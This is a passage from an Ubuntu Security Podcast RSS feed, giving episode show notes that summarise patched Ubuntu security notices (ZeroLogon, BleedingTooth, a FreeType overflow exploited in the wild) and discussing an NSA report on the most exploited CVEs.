  being exploited in-the-wild, plus we talk about the NSAs report into the
  most exploited vulnerabilities as well as the release of Ubuntu 20.10
  Groovy Gorilla.
  </description>
        <googleplay:description>  This week we cover security updates for NTP, Brotli, Spice, the Linux
  kernel (including BleedingTooth) and a FreeType vulnerability which is
  being exploited in-the-wild, plus we talk about the NSAs report into the
  most exploited vulnerabilities as well as the release of Ubuntu 20.10
  Groovy Gorilla.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover security updates for NTP, Brotli, Spice, the Linux
kernel (including BleedingTooth) and a FreeType vulnerability which is
being exploited in-the-wild, plus we talk about the NSAs report into the
most exploited vulnerabilities as well as the release of Ubuntu 20.10
Groovy Gorilla.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>74 unique CVEs addressed</p>
<h3 id="usn-4559-1-samba-update-01-04">[<a href="https://usn.ubuntu.com/4559-1/">USN-4559-1</a>] Samba update [01:04]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1472">CVE-2020-1472</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Follow up to <a href="https://usn.ubuntu.com/4510-1/">USN-4510-1</a> for &ldquo;ZeroLogon&rdquo; - that updated changed default to
enable secure channel - this one adds support for specifying per-machine
insecure netlogon usage plus additional hardening to check for possible
attacks from the client-specified challenge if have manually enabled
insecure channel in configuration</li>
</ul>
<h3 id="usn-4563-1-ntp-vulnerability-01-48">[<a href="https://usn.ubuntu.com/4563-1/">USN-4563-1</a>] NTP vulnerability [01:48]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8936">CVE-2019-8936</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7182">CVE-2018-7182</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Fix for previous <a href="https://ubuntu.com/security/CVE-2018-7182">CVE-2018-7182</a> introduced a possible NULL ptr deref that
could be triggered by a malicious client -&gt; DoS</li>
</ul>
<h3 id="usn-4568-1-brotli-vulnerability-02-12">[<a href="https://usn.ubuntu.com/4568-1/">USN-4568-1</a>] Brotli vulnerability [02:12]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8927">CVE-2020-8927</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Compression library / tool from Google designed for text compression,
especially for web fonts etc</li>
<li>Buffer overflow due to an integer overflow when using the one-shot
decompression option on attacker controlled data</li>
</ul>
<h3 id="usn-4570-1-urllib3-vulnerability-03-00">[<a href="https://usn.ubuntu.com/4570-1/">USN-4570-1</a>] urllib3 vulnerability [03:00]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-26137">CVE-2020-26137</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible CRLF injection if an attacker can control the request method
used in a call to urllib3 - can specify additional parameters such as
Host and Remainder after an injected CRLF to cause the request to
misbehave</li>
</ul>
<h3 id="usn-4572-1-usn-4572-2-spice-vulnerability-03-41">[<a href="https://usn.ubuntu.com/4572-1/">USN-4572-1</a>, <a href="https://usn.ubuntu.com/4572-2/">USN-4572-2</a>] Spice vulnerability [03:41]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14355">CVE-2020-14355</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Protocol for doing remote VM access - multiple buffer overflows in
decoding of QUIC image compression algorithm - and this affected both the
client and server side - DoS, RCE etc</li>
</ul>
<h3 id="usn-4576-1-linux-kernel-vulnerabilities-04-36">[<a href="https://usn.ubuntu.com/4576-1/">USN-4576-1</a>] Linux kernel vulnerabilities [04:36]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25641">CVE-2020-25641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25285">CVE-2020-25285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16120">CVE-2020-16120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14385">CVE-2020-14385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14314">CVE-2020-14314</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16119">CVE-2020-16119</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4577-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4577-1/">USN-4577-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-16120">CVE-2020-16120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16119">CVE-2020-16119</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4578-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4578-1/">USN-4578-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-26088">CVE-2020-26088</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25212">CVE-2020-25212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16120">CVE-2020-16120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14314">CVE-2020-14314</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19448">CVE-2019-19448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10322">CVE-2018-10322</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16119">CVE-2020-16119</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4579-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4579-1/">USN-4579-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25285">CVE-2020-25285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14314">CVE-2020-14314</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10322">CVE-2018-10322</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16119">CVE-2020-16119</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4580-1-linux-kernel-vulnerability">[<a href="https://usn.ubuntu.com/4580-1/">USN-4580-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>
<p>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)</p>
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-16119">CVE-2020-16119</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>
<p>DCCP protocol mishandled reuse of sockets, leading to a UAF - since can
be done by a local user could lead to root code execution, priv esc etc -
was reported to Canonical and we worked with upstream kernel devs on
resolving this etc</p>
</li>
</ul>
<h3 id="lsn-0072-1-linux-kernel-vulnerability">[<a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-October/005694.html">LSN-0072-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-16120">CVE-2020-16120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16119">CVE-2020-16119</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14386">CVE-2020-14386</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12114">CVE-2020-12114</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11935">CVE-2020-11935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11494">CVE-2020-11494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0067">CVE-2020-0067</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DCCP UAF</li>
<li>AF_PACKET buffer overflow (<a href="https://ubuntusecuritypodcast.org/episode-90/">Episode 90</a>)</li>
<li>Livepatched in the following kernels:
<ul>
<li>Ubuntu 18.04 LTS
<ul>
<li>aws - 72.1</li>
<li>generic - 72.1</li>
<li>lowlatency - 72.1</li>
<li>oem - 72.1</li>
</ul>
</li>
<li>Ubuntu 20.04 LTS
<ul>
<li>aws - 72.1</li>
<li>aws - 72.2</li>
<li>azure - 72.1</li>
<li>azure - 72.2</li>
<li>gcp - 72.1</li>
<li>gcp - 72.2</li>
<li>generic - 72.1</li>
<li>generic - 72.2</li>
<li>lowlatency - 72.1</li>
<li>lowlatency - 72.2</li>
</ul>
</li>
<li>Ubuntu 16.04 LTS
<ul>
<li>aws - 72.1</li>
<li>generic - 72.1</li>
<li>lowlatency - 72.1</li>
</ul>
</li>
<li>Ubuntu 14.04 ESM
<ul>
<li>generic - 72.1</li>
<li>lowlatency - 72.1</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4591-1-linux-kernel-vulnerabilities-06-20">[<a href="https://usn.ubuntu.com/4591-1/">USN-4591-1</a>] Linux kernel vulnerabilities [06:20]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12352">CVE-2020-12352</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12351">CVE-2020-12351</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4592-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4592-1/">USN-4592-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-24490">CVE-2020-24490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12352">CVE-2020-12352</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12351">CVE-2020-12351</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>BleedingTooth vulnerability</li>
<li>Announced by Intel, discovered by a security researcher at Google - not
much heads up to distros, kernel team worked quickly to respin affected
kernels (&gt;= 4.8) over the weekend</li>
<li>Originally was mention on twitter that Google were going to publish a
blog post with more details but this got held back to give time for
distros etc to patch</li>
</ul>
<h3 id="usn-4593-1-freetype-vulnerability-07-30">[<a href="https://usn.ubuntu.com/4593-1/">USN-4593-1</a>] FreeType vulnerability [07:30]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15999">CVE-2020-15999</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow -&gt; heap buffer overflow</li>
<li>Reported by Google to Freetype upstream with the comment that it was
being exploited in the wild</li>
<li>The patch simply moves a check that was added originally to fix another
CVE a few lines higher since it still provided the chance of an integer
overflow -&gt; heap buffer overflow</li>
<li>Update released for Ubuntu within 16h of the original report to the
upstream FreeType developers</li>
</ul>
<h3 id="usn-4558-1-libapreq2-vulnerabilities">[<a href="https://usn.ubuntu.com/4558-1/">USN-4558-1</a>] libapreq2 vulnerabilities</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12412">CVE-2019-12412</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4557-1-tomcat-vulnerabilities">[<a href="https://usn.ubuntu.com/4557-1/">USN-4557-1</a>] Tomcat vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-8735">CVE-2016-8735</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-6816">CVE-2016-6816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-6797">CVE-2016-6797</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-6796">CVE-2016-6796</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-6794">CVE-2016-6794</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-5018">CVE-2016-5018</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-0762">CVE-2016-0762</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4560-1-gon-gem-vulnerability">[<a href="https://usn.ubuntu.com/4560-1/">USN-4560-1</a>] Gon gem vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25739">CVE-2020-25739</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4561-1-rack-vulnerabilities">[<a href="https://usn.ubuntu.com/4561-1/">USN-4561-1</a>] Rack vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8184">CVE-2020-8184</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8161">CVE-2020-8161</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4562-1-kramdown-vulnerability">[<a href="https://usn.ubuntu.com/4562-1/">USN-4562-1</a>] kramdown vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14001">CVE-2020-14001</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4569-1-yaws-vulnerabilities">[<a href="https://usn.ubuntu.com/4569-1/">USN-4569-1</a>] Yaws vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-24916">CVE-2020-24916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24379">CVE-2020-24379</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4571-1-rack-cors-vulnerability">[<a href="https://usn.ubuntu.com/4571-1/">USN-4571-1</a>] rack-cors vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18978">CVE-2019-18978</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4564-1-apache-tika-vulnerabilities">[<a href="https://usn.ubuntu.com/4564-1/">USN-4564-1</a>] Apache Tika vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1951">CVE-2020-1951</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-1950">CVE-2020-1950</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4565-1-openconnect-vulnerability">[<a href="https://usn.ubuntu.com/4565-1/">USN-4565-1</a>] OpenConnect vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16239">CVE-2019-16239</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4566-1-cyrus-imap-server-vulnerabilities">[<a href="https://usn.ubuntu.com/4566-1/">USN-4566-1</a>] Cyrus IMAP Server vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19783">CVE-2019-19783</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11356">CVE-2019-11356</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4567-1-opendmarc-vulnerability">[<a href="https://usn.ubuntu.com/4567-1/">USN-4567-1</a>] OpenDMARC vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16378">CVE-2019-16378</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4573-1-vino-vulnerabilities">[<a href="https://usn.ubuntu.com/4573-1/">USN-4573-1</a>] Vino vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14404">CVE-2020-14404</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14403">CVE-2020-14403</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14402">CVE-2020-14402</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14397">CVE-2020-14397</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15681">CVE-2019-15681</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-7225">CVE-2018-7225</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2014-6053">CVE-2014-6053</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4574-1-libseccomp-golang-vulnerability">[<a href="https://usn.ubuntu.com/4574-1/">USN-4574-1</a>] libseccomp-golang vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-18367">CVE-2017-18367</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4575-1-dom4j-vulnerability">[<a href="https://usn.ubuntu.com/4575-1/">USN-4575-1</a>] dom4j vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10683">CVE-2020-10683</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4581-1-python-vulnerability">[<a href="https://usn.ubuntu.com/4581-1/">USN-4581-1</a>] Python vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-26116">CVE-2020-26116</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4582-1-vim-vulnerabilities">[<a href="https://usn.ubuntu.com/4582-1/">USN-4582-1</a>] Vim vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20807">CVE-2019-20807</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-17087">CVE-2017-17087</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4583-1-php-vulnerabilities">[<a href="https://usn.ubuntu.com/4583-1/">USN-4583-1</a>] PHP vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7070">CVE-2020-7070</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7069">CVE-2020-7069</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4589-1-containerd-vulnerability">[<a href="https://usn.ubuntu.com/4589-1/">USN-4589-1</a>] containerd vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15157">CVE-2020-15157</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4589-2-docker-vulnerability">[<a href="https://usn.ubuntu.com/4589-2/">USN-4589-2</a>] Docker vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15157">CVE-2020-15157</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4585-1-newsbeuter-vulnerabilities">[<a href="https://usn.ubuntu.com/4585-1/">USN-4585-1</a>] Newsbeuter vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-14500">CVE-2017-14500</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12904">CVE-2017-12904</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4584-1-htmlunit-vulnerability">[<a href="https://usn.ubuntu.com/4584-1/">USN-4584-1</a>] HtmlUnit vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-5529">CVE-2020-5529</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4546-2-firefox-regressions">[<a href="https://usn.ubuntu.com/4546-2/">USN-4546-2</a>] Firefox regressions</h3>
<ul>
<li>Affecting Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)</li>
</ul>
<h3 id="usn-4590-1-collabtive-vulnerability">[<a href="https://usn.ubuntu.com/4590-1/">USN-4590-1</a>] Collabtive vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2015-0258">CVE-2015-0258</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4586-1-php-imagemagick-vulnerability">[<a href="https://usn.ubuntu.com/4586-1/">USN-4586-1</a>] PHP ImageMagick vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11037">CVE-2019-11037</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4594-1-quassel-vulnerabilities">[<a href="https://usn.ubuntu.com/4594-1/">USN-4594-1</a>] Quassel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000179">CVE-2018-1000179</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000178">CVE-2018-1000178</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4595-1-grunt-vulnerability">[<a href="https://usn.ubuntu.com/4595-1/">USN-4595-1</a>] Grunt vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7729">CVE-2020-7729</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="nsa-report-on-25-most-exploited-cves-by-chinese-state-sponsored-actors-09-51">NSA Report on 25 most exploited CVEs by Chinese State-Sponsored Actors [09:51]</h3>
<ul>
<li><a href="https://twitter.com/NSACyber/status/1318568065769132035">https://twitter.com/NSACyber/status/1318568065769132035</a></li>
<li><a href="https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF">https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF</a></li>
<li>Most apply to appliances (network gateway devices) or Windows</li>
<li>Only 1 applies open source software for Linux
<ul>
<li>CVE-2018-6789 - Exim 4.90.1 - CVE was public <a href="https://www.openwall.com/lists/oss-security/2018/02/07/2">7 February 2018</a>, <a href="https://ubuntu.com/security/notices/USN-3565-1">patched
in affected Ubuntu releases</a> 5 days later on 12 February 2018</li>
<li>oss-security posting claims &lsquo;unsure of severity, an exploit is difficult&rsquo;</li>
<li>The researcher which found it provided a very detailed write-up about
the low-level details to exploit it on <a href="https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/">6th March 2018</a> but without an
actual PoC (although all details are there to reconstruct one)</li>
<li>First public PoC seems to be on <a href="https://medium.com/@straightblast426/my-poc-walk-through-for-cve-2018-6789-2e402e4ff588">2 May 2018</a> - there have been others
since (<a href="https://www.exploit-db.com/exploits/45671">exploitdb</a>, github etc)</li>
<li>So why does this one get exploited over others?
<ul>
<li>Availability of multiple PoC?</li>
<li>Have other distros not patched?</li>
<li>Are there lots of installs that are from source and have never been
updated?</li>
<li>Lots of old docker images of various exim with lots of Pulls
(although the <a href="https://hub.docker.com/r/tianon/exim4">most popular one</a> was updated 9 days ago)</li>
<li>Shows should always get your open source from a trusted, maintained
downstream like Ubuntu</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="ubuntu-20-dot-10-groovy-gorilla-release-13-50">Ubuntu 20.10 Groovy Gorilla Release [13:50]</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-announce/2020-October/000263.html">https://lists.ubuntu.com/archives/ubuntu-announce/2020-October/000263.html</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E093.mp3" length="15095549" type="audio/mpeg" /><itunes:duration>15:43</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 92
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-92/</link>
          <pubDate>Fri, 02 Oct 2020 10:14:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>c01fcea7ba122d9c6ccba207bc4cebf5a7358029b8a66114de13332ac1c55edf6ec53fd60288f3917d6adec39e5917c8b968e97a648d9ea0dfe0b9e6f5602a3b</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 92</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          It's CVE bankruptcy! With a deluge of CVEs to cover from the last 2 weeks,
  we take a particular look at the ZeroLogon vulnerability in Samba this
  week, plus Alex covers the AppArmor 3 release and some recent / upcoming
  webinars hosted...
        
        ]]></itunes:subtitle>
        <itunes:summary>  It's CVE bankruptcy! With a deluge of CVEs to cover from the last 2 weeks,
  we take a particular look at the ZeroLogon vulnerability in Samba this
  week, plus Alex covers the AppArmor 3 release and some recent / upcoming
  webinars hosted by the Ubuntu Security team.
  </itunes:summary>
        <description>  It's CVE bankruptcy! With a deluge of CVEs to cover from the last 2 weeks,
  we take a particular look at the ZeroLogon vulnerability in Samba this
  week, plus Alex covers the AppArmor 3 release and some recent / upcoming
  webinars hosted by the Ubuntu Security team.
  </description>
        <googleplay:description>  It's CVE bankruptcy! With a deluge of CVEs to cover from the last 2 weeks,
  we take a particular look at the ZeroLogon vulnerability in Samba this
  week, plus Alex covers the AppArmor 3 release and some recent / upcoming
  webinars hosted by the Ubuntu Security team.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>It&rsquo;s CVE bankruptcy! With a deluge of CVEs to cover from the last 2 weeks,
we take a particular look at the ZeroLogon vulnerability in Samba this
week, plus Alex covers the AppArmor 3 release and some recent / upcoming
webinars hosted by the Ubuntu Security team.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>121 unique CVEs addressed</p>
